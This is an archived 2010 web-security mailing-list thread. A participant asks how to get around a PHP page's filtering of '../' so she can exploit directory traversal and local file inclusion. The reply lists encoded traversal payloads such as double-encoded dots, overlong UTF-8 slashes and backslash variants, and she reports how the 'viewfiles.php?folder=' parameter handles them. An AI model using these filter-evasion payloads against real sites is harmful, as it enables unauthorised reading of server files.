[WEB SECURITY] ../ filtered

Beatriz Duran beatrizdrn at yahoo.com
Tue Feb 16 09:40:24 EST 2010


Shlomi,

I tried those already; but they and the ones with ".." are rejected, the variable is verifying the string before running it and with the combination:

%252e%252e/FILENAME happens this:

viewfiles.php?folder=%252e%252e/

The 25s are removed, the so the %2e%2e are left but transformed in pure text so the page reports that the directory %2e%2e doesn't exist; but if I apply purely  viewfiles.php?folder=%2e%2e/ the page reject them and say .. are not allowed.






 I    Have    Learned    So much from God    That I can no longer    Call    Myself A Christian, a Hindu, a Muslim    A Buddhist, a Jew.    The Truth has shared so much of Itself   With me  That I can no longer call myself     A man, a woman, and angel    Or even pure    Soul.   Love has    Befriended Hafiz so completely    It has turned to ash    And freed    Me    Of every concept and image    My mind has ever known. –Hafiz, Persian poet (1315 – 1390)




________________________________
From: Shlomi Narkolayev <shlominar at gmail.com>
To: beatrizdrn at yahoo.com; websecurity at webappsec.org
Sent: Tue, February 16, 2010 12:41:16 AM
Subject: RE: [WEB SECURITY] ../ filtered


Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME


Soon I'll upload to my blog new 1400 variants for directory traversal.

Kind Regards,
Narkolayev Shlomi.

 
  

From:Beatriz Duran [mailto:beatrizdrn at yahoo.com] 
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered 
 
Hi, I need to find a vulnerability in a url that
could be exploited for directory traversal and LFI; the page is working with
PHP but it is filtering /../ and also /%2e%2e/, because the pace is  using
ISO for Latin characters I can't use unicode extended because it reinterpret
with other values; is there another way to work around the filter?


      
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100216/82176682/attachment.html>


More information about the websecurity mailing list